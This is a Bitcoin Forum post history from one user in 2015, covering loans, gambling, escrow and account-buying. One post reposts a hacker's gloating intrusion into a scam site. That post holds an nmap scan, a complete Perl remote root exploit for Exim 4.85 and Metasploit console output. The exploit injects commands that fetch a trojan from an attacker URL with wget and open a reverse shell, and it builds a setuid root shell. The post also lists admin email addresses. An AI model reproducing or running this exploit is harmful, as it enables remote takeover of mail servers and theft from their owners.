Bitcoin Forum
May 12, 2024, 09:30:22 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: [1]
1  Other / Off-topic / Android app, help? on: August 05, 2015, 09:38:15 AM
This is not bitcoin related, but however i will ask it.

I want to make an app that can receive a wifi signal from a first person view camera.

So on my phone i can see what the camera sees through a wifi signal.

Can anyone help me ?
2  Economy / Service Discussion / Escrow needed on: August 04, 2015, 05:02:10 PM
I need a trusted, if possible free escrow asap. Please pm me.
3  Other / Off-topic / What to do if i bought a new account? on: August 04, 2015, 04:09:32 PM
So if i buy a account, should i let people know who i bought it from, when i bought it, and who is new owner?
4  Economy / Digital goods / WTB member on: August 04, 2015, 08:23:44 AM
I want to buy memebr account with 112 activity, no negative trust.

Please PM Me prices.
5  Economy / Service Discussion / LEGIT CLOUDMINING SERVICE? on: August 02, 2015, 08:34:04 AM
Is there any high trusted cloudmining service that not will end up in a scam?
6  Economy / Scam Accusations / READ on: August 01, 2015, 07:03:34 PM
This are same users, for sure:

https://bitcointalk.org/index.php?topic=1140738.msg12027715#msg12027715

https://bitcointalk.org/index.php?topic=1140744.msg12027739#msg12027739

Both loan request are from brand new accounts and are posted in 2-3 minutes from each other.

7  Economy / Lending / EarnBtcFaucet's Microloaning service on: July 31, 2015, 05:32:26 AM
I will be lending to evryone with a good reputation and can provide a colleteral. The interest rate is between 10% and 20%, this depends on the term length. Any colletral will be hold by an escrow. I will contact SebastianJu soon!

Apply for loan like this:
Bitcoin address:
Loan amount:
Repayment date:
Repayment amount:
8  Economy / Gambling / GRADE THIS PARLAY -SOCCER- on: July 30, 2015, 03:29:39 PM
I made a parlay on soccer, now i want your vopinion on it,  http://directbet.eu/BetStatus.cshtml?BetID=1JodqqcJ8o6nXtLLfhdNjcsJEbSnyiZjdT

What do u suggest, add some game, or scrap a game, so yes which one?
9  Economy / Gambling / EarnBtcFaucet's Soccertips[also post your own prediction] on: July 30, 2015, 09:48:27 AM
I am offering my free soccer predictions. Ill keep track of my stats!


Stats:
Wins: 1
Loses: 2
Draws: 0
10  Other / Meta / TRUST RATING?? on: July 29, 2015, 10:06:02 PM
Can someone explain how to get light green or dark green trust???
11  Economy / Service Announcements / Best Website Vulnerability Scanner Service[2 FREE VOUCH COPIES] on: July 28, 2015, 02:47:59 PM
I am EarnBtcFaucet and I am offering a website vulnerability scan service to you.

What vulnerability will I try to find:

- SQL Injection
- HTML Injection
- Javascript Injection
- Sensitive File Directories


VOUCH COPIES AVAILABLE: 2 LEFT
12  Economy / Gambling / Good bitcoin casinos? on: June 29, 2015, 10:04:44 AM
I know a few casinos:

Tothemoon.me
Just-dice
Primedice


Are there better casinos or are these the best?
13  Economy / Service Discussion / SCAMMER GETS HACKED|LOL|KARMA on: May 05, 2015, 06:06:58 AM
Look at this:

hehe i told u dont fucking play with me !  Kiss
where is u "ponzi" now ?  Roll Eyes Grin

some infos to public
http://pastebin.com/VGcARfGe

ORT     STATE  SERVICE    VERSION
21/tcp   open   ftp        Pure-FTPd
22/tcp   open   ssh        OpenSSH 5.3 (protocol 2.0)
26/tcp   closed rsftp
53/tcp   open   tcpwrapped
80/tcp   open   http       nginx
110/tcp  open   pop3       Dovecot pop3d
143/tcp  open   imap       Dovecot imapd
443/tcp  open   http       nginx
465/tcp  open   ssl/smtp   Exim smtpd 4.85
993/tcp  open   ssl/imap   Dovecot imapd
995/tcp  open   ssl/pop3   Dovecot pop3d
3306/tcp open   mysql      MySQL (unauthorized)
8080/tcp closed http-proxy

nice 465/tcp  open   ssl/smtp   Exim smtpd 4.85  Shocked

code of exploit in perl:
Code:
#Exim 4.85 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope
#Modified perl version of metasploit module

=for comment

use this connect back shell as "trojanurl" and be sure to setup a netcat,

---snip---

$system = '/bin/sh';
$ARGC=@ARGV;
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");

open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, NULL);
execl("/bin/sh", "sh", NULL);
}
};
close FILE;

system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;

system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
system($system);

---snip---

=cut

use IO::Socket;

if ($#ARGV ne 3) {
        print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n";
        print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n";
        exit;
}

$|=1;

$trojan = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$helohost = "abcde.com";

$max_msg = 52428800;

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "25",
                                 Proto    => 'tcp');

while(<$sock>) {
        print;
        if ($_ =~ /220 /) { last;}
}

print $sock "EHLO $helohost\r\n";
while(<$sock>) {
        print;
        if ($_ =~ /250-SIZE (\d+)/) {
                $max_msg = $1;
                print "Set size to $max_msg !\n";
        }
        if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) {
                $revdns = $1;
                $saddr = $2;
        }
        if ($_ =~ /250 /) { last;}
}

if ($revdns eq $helohost) {
        $vv = "";
} else {
        $vv = $revdns. " ";
}

$vv .= "(" . $helohost . ")";

$from = "root\@local.com";
$to = "postmaster\@localhost";

$msg_len = $max_msg + 1024*256;
$logbuffer_size = 8192;

$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n";
$logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";

$filler = "V" x (8 * 16);
$logbuffer_size -= 3;

for ($k=0;$k<60;$k++) {
if (length($logbuffer) >= $logbuffer_size) {last;}
$hdr = sprintf("Header%04d: %s\n", $k, $filler);
$newlen = length($logbuffer) + length($hdr);
if ($newlen > $logbuffer_size) {
        $newlen -= $logbuffer_size;
        $off = length($hdr) - $newlen - 2 - 1;
        $hdr = substr($hdr, 0, $off);
        $hdr .= "\n";
}
$hdrs .= $hdr;
$logbuffer .= "  " . $hdr;
}

$hdrx = "HeaderX: ";
$k2 = 3;
for ($k=1;$k<=200;$k++) {
        if ($k2 > 12) {
                $k2 = 3;
        }
#        $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} ";
        $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} ";
        $k2++;
}

$v = "A" x 255 . "\n";
$body = "";
while (length($body) < $msg_len) {
        $body .= $v;
}

$body = substr($body, 0, $msg_len);

print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";
$v = <$sock>;
print $v;
print $sock "DATA\r\n";
$v = <$sock>;
print $v;

print "Sending large buffer, please wait...\n";

print $sock $hdrs;
print $sock $hdrx . "\n";
print $sock $body;
print $sock "\r\n.\r\n";
$v = <$sock>;
print $v;
print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";

while(1){};

msf core...
Code:
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...\
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            http://metasploit.pro


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]]
+ -- --=[ 1389 exploits - 788 auxiliary - 223 post        ]
+ -- --=[ 356 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search Exim
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                   Disclosure Date  Rank       Description
   ----                                   ---------------  ----       -----------
   exploit/linux/smtp/exim4_dovecot_exec  2015-01-03       excellent  Exim and Dovecot Insecure Configuration Command Injection
   exploit/unix/smtp/exim4_string_format  2013-12-07       excellent  Exim4 string_format Function Heap Buffer Overflow

msf >

some screenshot


some problem if u have i cant windraw all here  Grin

admin@money10.net
admin@14daily.com
admin@bitcoinfield.net
admin@profit12.com
admin@lucrebit.com

wellcome speedy1987 in me world
dont sarching me i have 20 firewole 10 nat and 5 vps hahah.
now u all cant windraw u monet but if u dont have skills...
this is public adres BTC:112QrMgXdaYdSS3n2NnnNWris8feJuQvBk  i cant windraw u all people money just put here 0.5 btc ist promotion ! now i go to sleep good night all !
pozdrowienia ! polish elite hacker team  Kiss


14  Economy / Lending / Offering Microloans|Colleteral needed| on: May 04, 2015, 12:28:00 PM
Hello everyone,

I am offering a microloan service. I only loan to people with high trust rating and a valid colleteral.

Interest: 20%

I have the right to deny any loan without reason.

Active loans:0
Succesful loans:0
Unsuccesful loans: 0

In case you don't trust me, we can use escrow.

I will lend up to 1 BTC.
15  Bitcoin / Project Development / Developing question... on: May 04, 2015, 06:57:13 AM
Hello,

I am thinking about making a website, the website will use the computers gpu/cpu to mine btc. And the people that are on the webpage get a reward.

Anyone knows how to let a webpage use the gpu/cpu from website users?
Pages: [1]
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!